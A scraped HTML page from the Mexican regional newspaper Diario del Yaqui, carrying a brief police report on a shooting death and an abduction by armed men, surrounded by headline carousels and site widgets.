    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/troylos-lidera-la-liga-jose-julian-quiroz/">Troylos lidera la Liga José Julián Quiroz</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="no-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Mantiene Delegación el invicto" href="http://diariodelyaqui.mx/mantiene-delegacion-el-invicto/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/placeholder-plain.gif" alt="Mantiene Delegación el invicto" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/mantiene-delegacion-el-invicto/">Mantiene Delegación el invicto</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Se queda Rodolfo Solís con dos  gemas de la triple corona de bateo" href="http://diariodelyaqui.mx/se-queda-rodolfo-solis-con-dos-gemas-de-la-triple-corona-de-bateo/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-7-80x80.jpg" alt="Se queda Rodolfo Solís con dos  gemas de la triple corona de bateo" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/se-queda-rodolfo-solis-con-dos-gemas-de-la-triple-corona-de-bateo/">Se queda Rodolfo Solís con dos gemas&hellip;</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Camionazo en Navojoa" href="http://diariodelyaqui.mx/camionazo-en-navojoa/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-10-80x80.jpg" alt="Camionazo en Navojoa" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/camionazo-en-navojoa/">Camionazo en Navojoa</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Detenidos con armas cortas" href="http://diariodelyaqui.mx/detenidos-con-armas-cortas/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-12-80x80.jpg" alt="Detenidos con armas cortas" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/detenidos-con-armas-cortas/">Detenidos con armas cortas</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Arrestan  a marino" href="http://diariodelyaqui.mx/arrestan-a-marino/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-6-80x80.jpg" alt="Arrestan  a marino" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/arrestan-a-marino/">Arrestan a marino</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Asesinan a uno y “levantan” a otro" href="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-7-80x80.jpg" alt="Asesinan a uno y “levantan” a otro" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/">Asesinan a uno y “levantan” a otro</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Se aprovecha, le dan posada y roba" href="http://diariodelyaqui.mx/se-aprovecha-le-dan-posada-y-roba/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-11-80x80.jpg" alt="Se aprovecha, le dan posada y roba" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/se-aprovecha-le-dan-posada-y-roba/">Se aprovecha, le dan posada y roba</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Cuarto lugar en delincuencia" href="http://diariodelyaqui.mx/cuarto-lugar-en-delincuencia/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-8-80x80.jpg" alt="Cuarto lugar en delincuencia" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/cuarto-lugar-en-delincuencia/">Cuarto lugar en delincuencia</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Arrestan a probable narcomenudista" href="http://diariodelyaqui.mx/arrestan-a-probable-narcomenudista-2/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-4-80x80.jpg" alt="Arrestan a probable narcomenudista" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/arrestan-a-probable-narcomenudista-2/">Arrestan a probable narcomenudista</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Se incendia vehículo,  no hay lesionados" href="http://diariodelyaqui.mx/se-incendia-vehiculo-no-hay-lesionados/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-1-80x80.jpg" alt="Se incendia vehículo,  no hay lesionados" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/se-incendia-vehiculo-no-hay-lesionados/">Se incendia vehículo, no hay lesionados</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Detenido con  pistola y droga" href="http://diariodelyaqui.mx/detenido-con-pistola-y-droga/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-2-80x80.jpg" alt="Detenido con  pistola y droga" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/detenido-con-pistola-y-droga/">Detenido con pistola y droga</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="no-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Carambola en la Tabasco" href="http://diariodelyaqui.mx/carambola-en-la-tabasco/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/placeholder-plain.gif" alt="Carambola en la Tabasco" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/carambola-en-la-tabasco/">Carambola en la Tabasco</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Abucheado empate" href="http://diariodelyaqui.mx/abucheado-empate/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-2-80x80.jpg" alt="Abucheado empate" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/abucheado-empate/">Abucheado empate</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        		  </ul>

              </div><!-- .horizontal-carousel-->

              <div class="control next"></div>

          </div><!-- .horizontal-carousel-container -->

	   </div><!-- .recent-posts-carousel -->

    </div><!-- .recent-posts-carousel-container -->

	<div class="row">

        <main class="content large-9 columns sidebar-right"  role="main" itemscope itemtype="http://schema.org/Article">

            <article id="post-104501" class="post-104501 post type-post status-publish format-standard has-post-thumbnail hentry category-policiaca">

    
        <div class="row post-top large">

            <div class="entry-media-wrapper">

			
	            <div class="entry-content-media" style="background-image: url(http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-7-865x445.jpg);">
					
						                
	                	<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-7-865x445.jpg" alt="Asesinan a uno y “levantan” a otro" style="display: none;"/>
	                
	                	
	            </div>
	
	        </div><!-- END .entry-media-wrapper -->
	
	        <div class="entry-header-wrapper">

    
        	<header class="entry-header">

        		
        		
        			<h1 class="entry-title" itemprop="headline">Asesinan a uno y “levantan” a otro</h1><!-- END .entry-title -->

        		
        		        <div class="entry-meta clearfix">

            
            
        <div class="author-link">
            <img alt='Diario del Yaqui' src='http://diariodelyaqui.mx/wp-content/uploads/2018/05/Diario-del-Yaqui_avatar_1525246977-24x24.png' class='avatar avatar-24 photo' height='24' width='24' />            <a class="author-name author" href="http://diariodelyaqui.mx/author/joel/" title="Ver todos los Artículos por: Diario del Yaqui" rel="author">Diario del Yaqui</a>
        </div>

    <div class="date">Hace 7 horas</div>
        </div><!-- END .entry-meta -->
    
        	</header><!-- END .entry-header -->

    
        </div><!-- END .large-6.columns -->

    </div><!-- END .row -->

    
    
	<div class="entry-content">

		
		<div itemprop="articleBody" class="clearfix">
			<p>Por: Ricardo López</p>
<p>A las 3:20 horas de este lunes fue localizado al interior de un domicilio de la calle 26 y la avenida B y C una persona sin vida después de reportar la detonación de varias armas de fuego.<span id="more-104501"></span><br />
Asimismo se reportó por vecinos de la víctima que otra persona del sexo masculino fue sacado a la la fuerza del domicilio y llevado por un grupo de hombres armados que se trasladaban a bordo de tres pick up.<br />
Al llegar las autoridades al lugar fue localizado en el interior de un cuarto, el cuerpo de un joven de 19 años de edad con domicilio en dicho punto el cual, lucía boca abajo con tres orificios de arma de fuego, e igual número de casquillos fueron localizados ya percutidos de .9 milímetros y calibre 22.<br />
La persona sin vida fue identificada como José Armando L.G. y se desconoce la identidad de la persona que fue privada de su libertad hasta el momento.<br />
Este hecho se suma a la serie de ejecuciones que se han registrado en las últimas semanas en el Municipio.</p>
<!-- Simple Share Buttons Plus (v1.2.4) simplesharebuttons.com/plus --><div class="ssbp-set--one ssbp--state-hidden ssbp-wrap ssbp--centred ssbp--theme-2" data-ssbp-counts="true" data-ssbp-total-counts="true" data-ssbp-toggle="true" data-ssbp-responsive="true"><button class="ssbp-toggle-switch ssbp-toggle-close"><span></span></button><div class="ssbp-container" data-ssbp-share-text="" data-ssbp-url="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" data-ssbp-title="Asesinan a uno y “levantan” a otro" data-ssbp-short-url="" data-ssbp-post-id="104501"><ul class="ssbp-list"><li class="ssbp-li--whatsapp"><a href="whatsapp://send?text=http%3A%2F%2Fdiariodelyaqui.mx%2Fasesinan-a-uno-y-levantan-a-otro%2F+Asesinan+a+uno+y+%E2%80%9Clevantan%E2%80%9D+a+otro" class="ssbp-btn ssbp-whatsapp"  data-ssbp-title="Asesinan a uno y “levantan” a otro" data-ssbp-url="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" data-ssbp-site="WhatsApp" ><span class="ssbp-text">WhatsApp</span></a></li><li class="ssbp-li--facebook"><a href="http://www.facebook.com/sharer.php?u=http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" class="ssbp-btn ssbp-facebook ssbp-facebook--standard"  data-ssbp-title="Asesinan a uno y “levantan” a otro" data-ssbp-url="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" data-ssbp-site="Facebook" ><span class="ssbp-text">Facebook</span></a></li><li class="ssbp-li--twitter"><a href="https://twitter.com/share?url=http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/&amp;text=Asesinan+a+uno+y+%E2%80%9Clevantan%E2%80%9D+a+otro+&amp;hashtags=" class="ssbp-btn ssbp-twitter ssbp-twitter--standard" data-ssbp-title="Asesinan a uno y “levantan” a otro" data-ssbp-url="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" data-ssbp-site="Twitter" ><span class="ssbp-text">Twitter</span></a></li><li class="ssbp-li--google"><a href="https://plus.google.com/share?url=http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" class="ssbp-btn ssbp-google"  data-ssbp-title="Asesinan a uno y “levantan” a otro" data-ssbp-url="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" data-ssbp-site="Google+" ><span class="ssbp-text">Google+</span></a></li><li class="ssbp-li--email"><a href="/cdn-cgi/l/email-protection#112e4264737b7472652c50627462787f707f317031647f7e316831f3918d7d7467707f65707ff3918c3170317e65637e37707c612a537e75682c342321796565612b3e3e75787063787e75747d68706064783f7c693e70627462787f707f3c703c647f7e3c683c7d7467707f65707f3c703c7e65637e3e" class="ssbp-btn ssbp-email ssbp-email-popup" data-ssbp-title="Asesinan a uno y “levantan” a otro" data-ssbp-url="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" data-ssbp-site="Email"><span class="ssbp-text">Email</span></a></li></ul><div class="ssbp-input-url-div"><input class="ssbp-input-url" type="text" value="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" /></div></div></div>		</div>

		
	</div><!-- END .entry-content -->
	
</article><!-- END #post-104501 -->
        <footer class="meta clearfix">
                        <div class="categories clearfix"><strong>Publicado:</strong><ul class="post-categories">
	<li><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/" >Policiaca</a></li></ul></div>
                </footer><!-- END .entry-meta -->

    <section class="about-author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person">
	
	<div class="inner clearfix">
	
	     	
	    <h3><span>Acerca del Autor</span></h3>
	
		<div class="author-avatar" itemprop="image">
			<img alt='Diario del Yaqui' src='http://diariodelyaqui.mx/wp-content/uploads/2018/05/Diario-del-Yaqui_avatar_1525246977-120x90.png' class='avatar avatar-120 photo' height='120' width='120' />		</div><!-- END .author-avatar -->
	
		<div class="author-desc author" >
			<h4 itemprop="name">Diario del Yaqui</h4>
			<p>
	
				Este autor no ha añadido una biografía. Mientras tanto Diario del Yaqui ha contribuido 13740 artículos.	
					<a href="http://diariodelyaqui.mx/author/joel/">
						Presione aquí					</a>
	
					para verlos.	
	 				
			</p>
	
			
    <ul class="author-links">

        
            <li><a target="_blank" href="/cdn-cgi/l/email-protection#80eaefe5ecfae1faf5e5f4e1c0e7ede1e9ecaee3efed" title="Email Diario del Yaqui"><span class="social-icon email"></span></a></li>

        
    </ul><!-- END .author-links -->

    	
		</div><!-- END .large-10 .columns -->
		
	</div>
	
</section><!-- END .about-author -->
		<div id="related-posts" class="clearfix">

			<h3><span>Notas Relacionadas</span></h3>

			<ul class="clearfix five-items">

			
				<li class="has-thumb ">

					<a href="http://diariodelyaqui.mx/camionazo-en-navojoa/" class="inner">

						<div class="entry-content-media">
							<div class="post-thumb preload image-loading">
	                        									<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-10-300x302.jpg" alt="Camionazo en Navojoa" width="300" height="302"/>
	                       			                       	</div>
	                    </div>

						<header class="entry-header">
							        <div class="entry-meta clearfix">
                        <div class="date">Hace 7 horas</div>                    </div><!-- END .entry-meta -->
    							<h4 class="entry-title">Camionazo en Navojoa</h4>
							        <div class="entry-excerpt">El accidente se registró al sur de la ciudad dejando 4 lesionados WhatsApp</div><!-- END .entry-excerpt -->
    	 					</header><!-- .entry-summary -->

					</a>

				</li><!--column-->

	  			
			
				<li class="has-thumb ">

					<a href="http://diariodelyaqui.mx/detenidos-con-armas-cortas/" class="inner">

						<div class="entry-content-media">
							<div class="post-thumb preload image-loading">
	                        									<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-12-299x150.jpg" alt="Detenidos con armas cortas" width="299" height="150"/>
	                       			                       	</div>
	                    </div>

						<header class="entry-header">
							        <div class="entry-meta clearfix">
                        <div class="date">Hace 7 horas</div>                    </div><!-- END .entry-meta -->
    							<h4 class="entry-title">Detenidos con armas cortas</h4>
							        <div class="entry-excerpt">Por: Ricardo López Al lograr la intercepción de un vehículo sospechoso d</div><!-- END .entry-excerpt -->
    	 					</header><!-- .entry-summary -->

					</a>

				</li><!--column-->

	  			
			
				<li class="has-thumb ">

					<a href="http://diariodelyaqui.mx/arrestan-a-marino/" class="inner">

						<div class="entry-content-media">
							<div class="post-thumb preload image-loading">
	                        									<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-6-299x150.jpg" alt="Arrestan  a marino" width="299" height="150"/>
	                       			                       	</div>
	                    </div>

						<header class="entry-header">
							        <div class="entry-meta clearfix">
                        <div class="date">Hace 7 horas</div>                    </div><!-- END .entry-meta -->
    							<h4 class="entry-title">Arrestan  a marino</h4>
							        <div class="entry-excerpt">Por: Ricardo López Dos personas lesionadas y daños materiales dejó el ch</div><!-- END .entry-excerpt -->
    	 					</header><!-- .entry-summary -->

					</a>

				</li><!--column-->

	  			
			
				<li class="has-thumb ">

					<a href="http://diariodelyaqui.mx/se-aprovecha-le-dan-posada-y-roba/" class="inner">

						<div class="entry-content-media">
							<div class="post-thumb preload image-loading">
	                        									<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-11-299x150.jpg" alt="Se aprovecha, le dan posada y roba" width="299" height="150"/>
	                       			                       	</div>
	                    </div>

						<header class="entry-header">
							        <div class="entry-meta clearfix">
                        <div class="date">Hace 7 horas</div>                    </div><!-- END .entry-meta -->
    							<h4 class="entry-title">Se aprovecha, le dan posada y roba</h4>
							        <div class="entry-excerpt">Por: Ricardo López Dulce María, de 18 años de edad, sin domicilio fijo e</div><!-- END .entry-excerpt -->
    	 					</header><!-- .entry-summary -->

					</a>

				</li><!--column-->

	  			
			
				<li class="has-thumb ">

					<a href="http://diariodelyaqui.mx/cuarto-lugar-en-delincuencia/" class="inner">

						<div class="entry-content-media">
							<div class="post-thumb preload image-loading">
	                        									<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-8-299x150.jpg" alt="Cuarto lugar en delincuencia" width="299" height="150"/>
	                       			                       	</div>
	                    </div>

						<header class="entry-header">
							        <div class="entry-meta clearfix">
                        <div class="date">Hace 7 horas</div>                    </div><!-- END .entry-meta -->
    							<h4 class="entry-title">Cuarto lugar en delincuencia</h4>
							        <div class="entry-excerpt">Con un 8.16% de la participación en la incidencia delictiva en Sonora What</div><!-- END .entry-excerpt -->
    	 					</header><!-- .entry-summary -->

					</a>

				</li><!--column-->

	  			
			
		  </ul>

	   </div><!--related-->

	
<div id="comments" class="no-comments" itemscope itemtype="http://schema.org/UserComments">

	
			<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title"><span class="comment-header">Dejar un Comentario</span> <small><a rel="nofollow" id="cancel-comment-reply-link" href="/asesinan-a-uno-y-levantan-a-otro/#respond" style="display:none;">Cancelar respuesta</a></small></h3>			<form action="http://diariodelyaqui.mx/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<textarea id="comment" name="comment" cols="45" rows="8" aria-describedby="form-allowed-tags" aria-required="true" required="required"></textarea>
			<div class="comment-form-author clearfix">
			<input id="author" name="author" type="text" value="" size="30" aria-required='true' required='required' />
			<h6><label for="author">Nombre<span class="required">*</span></label></h6>
			</div>

			<div class="comment-form-email clearfix">
			<input id="email" name="email" type="text" value="" size="30" aria-required='true' required='required' />
			<h6><label for="email">Email<span class="required">*</span></label></h6>
			</div>

			<div class="comment-form-url clearfix">
			<input id="url" name="url" type="text" value="" size="30" />
			<h6><label for="url">Sitio Web</label></h6>
			</div>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentario" /> <input type='hidden' name='comment_post_ID' value='104501' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="2ccf3e7986" /></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Recibir un email con los siguientes comentarios a esta entrada.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Recibir un email con cada nueva entrada.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="16"/></p>			</form>
			</div><!-- #respond -->
	

	
</div><!-- END #comments-respond -->            <meta itemprop="datePublished" content="2018-05-28T23:27:27-07:00"/>
            <meta itemprop="dateModified" content="2018-05-28T23:27:27-07:00"/>

            <meta itemprop="image" content="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-7.jpg"/>
        </main><!-- END -->

        
            <aside class="large-3 columns sidebar-right sidebar-wrapper" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">

                <div class="sidebar">

                     <div class="social-icons-wrapper">
             <ul class="social-icons"><li class="twitter"><a href="http://www.twitter.com/diarioyaqui" target="_blank"><span class="social-icon twitter style1" data-type="twitter"></span></a></li>
<li class="facebook"><a href="http://www.facebook.com/202973989884055" target="_blank"><span class="social-icon facebook style1" data-type="facebook"></span></a></li>
</ul>
        </div>
<div class="widget_text widget widget_custom_html clearfix"><div class="textwidget custom-html-widget"><div id="fb-root"></div>
<script data-cfasync="false" src="/cdn-cgi/scripts/f2bf09f8/cloudflare-static/email-decode.min.js"></script><script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = 'https://connect.facebook.net/es_LA/sdk.js#xfbml=1&version=v3.0&appId=213389832723150&autoLogAppEvents=1';
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script></div></div><div class="widget widget_radium_buzz_widget clearfix">        
        <div class="featured">
        
        <h3 class="widget-buzz-header"><span>MÁS NOTICIAS</span></h3>
        <ul class="widget-buzz">
                    <li>
                <div class="entry-meta"><div class="date">mayo 28, 2018</div></div>                <h3 class="entry-title"><a href="http://diariodelyaqui.mx/camionazo-en-navojoa/">Camionazo en Navojoa</a></h3>
            </li>
                        <li>
                <div class="entry-meta"><div class="date">mayo 28, 2018</div></div>                <h3 class="entry-title"><a href="http://diariodelyaqui.mx/cuarto-lugar-en-delincuencia/">Cuarto lugar en delincuencia</a></h3>
            </li>
                        <li>
                <div class="entry-meta"><div class="date">mayo 28, 2018</div></div>                <h3 class="entry-title"><a href="http://diariodelyaqui.mx/arrestan-a-probable-narcomenudista-2/">Arrestan a probable narcomenudista</a></h3>
            </li>
                        <li>
                <div class="entry-meta"><div class="date">mayo 28, 2018</div></div>                <h3 class="entry-title"><a href="http://diariodelyaqui.mx/temen-a-secuelas-por-vacuna-vph/">Temen a secuelas por vacuna VPH</a></h3>
            </li>
                        <li>
                <div class="entry-meta"><div class="date">mayo 28, 2018</div></div>                <h3 class="entry-title"><a href="http://diariodelyaqui.mx/concursara-obregon-para-ciudad-creativa/">Concursará Obregón para Ciudad Creativa</a></h3>
            </li>
                        <li>
                <div class="entry-meta"><div class="date">mayo 28, 2018</div></div>                <h3 class="entry-title"><a href="http://diariodelyaqui.mx/cae-nivel-de-oviachic-al-28-6/">Cae nivel de “Oviáchic” al 28.6%</a></h3>
            </li>
            </ul>
        
        </div></div>		<div class="widget widget_recent_entries clearfix">		<h5 class="widget-title"><span>Entradas recientes</span></h5>		<ul>
											<li>
					<a href="http://diariodelyaqui.mx/medias-blancas-cae-ante-indios/">Medias Blancas cae ante Indios</a>
									</li>
											<li>
					<a href="http://diariodelyaqui.mx/tras-analizar-el-video-del-pasado-domingo-de-carril-san-isidro/">Tras analizar el video del pasado domingo de Carril San Isidro&#8230;</a>
									</li>
											<li>
					<a href="http://diariodelyaqui.mx/lamentan-salida-de-valdeomillos-de-la-seleccion-nacional/">Lamentan salida de Valdeomillos de la Selección Nacional</a>
									</li>
											<li>
					<a href="http://diariodelyaqui.mx/habra-jornada-17-de-futbol-veterano-municipal/">Habrá Jornada 17 de Futbol Veterano Municipal</a>
									</li>
											<li>
					<a href="http://diariodelyaqui.mx/jornada-de-futbol-rapido/">Jornada de futbol rápido</a>
									</li>
					</ul>
